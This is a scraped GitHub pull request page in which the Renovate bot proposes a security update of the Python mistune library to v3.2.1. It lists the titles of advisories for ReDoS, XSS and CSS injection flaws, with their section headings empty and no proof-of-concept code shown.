Saved searches

Use saved searches to filter your results more quickly

chore(deps): update dependency mistune to v3.2.1 [security]#642

chore(deps): update dependency mistune to v3.2.1 [security]#642
renovate[bot] wants to merge 1 commit into
mainfrom
renovate/pypi-mistune-vulnerability

renovate Bot commented May 8, 2026 •

edited

Loading

Uh oh!

github-actions Bot commented May 8, 2026 •

edited

Loading

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

0 participants

Conversation

renovate Bot commented May 8, 2026 • edited Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

Mistune has a ReDoS in LINK_TITLE_RE that allows denial of service via crafted Markdown input

Details

Summary

Details

PoC

Impact

Suggested Fix

Severity

References

Mistune Heading ID Attribute has Injection XSS

Details

Summary

Details

PoC

Script

Impact

Severity

References

Mistune TOC Anchor Injection XSS

Details

Summary

Details

PoC

Script

Impact

Severity

References

Mistune Image Directive CSS Injection Vulnerability

Details

Summary

Details

PoC

Script

Impact

Severity

References

Release Notes

v3.2.1

🐞 Bug Fixes

View changes on GitHub

Configuration

Uh oh!

github-actions Bot commented May 8, 2026 • edited Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

☂️ Python Coverage

Overall Coverage

New Files

Modified Files

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

0 participants

renovate Bot commented May 8, 2026 •

edited

Loading

`v3.2.1`

github-actions Bot commented May 8, 2026 •

edited

Loading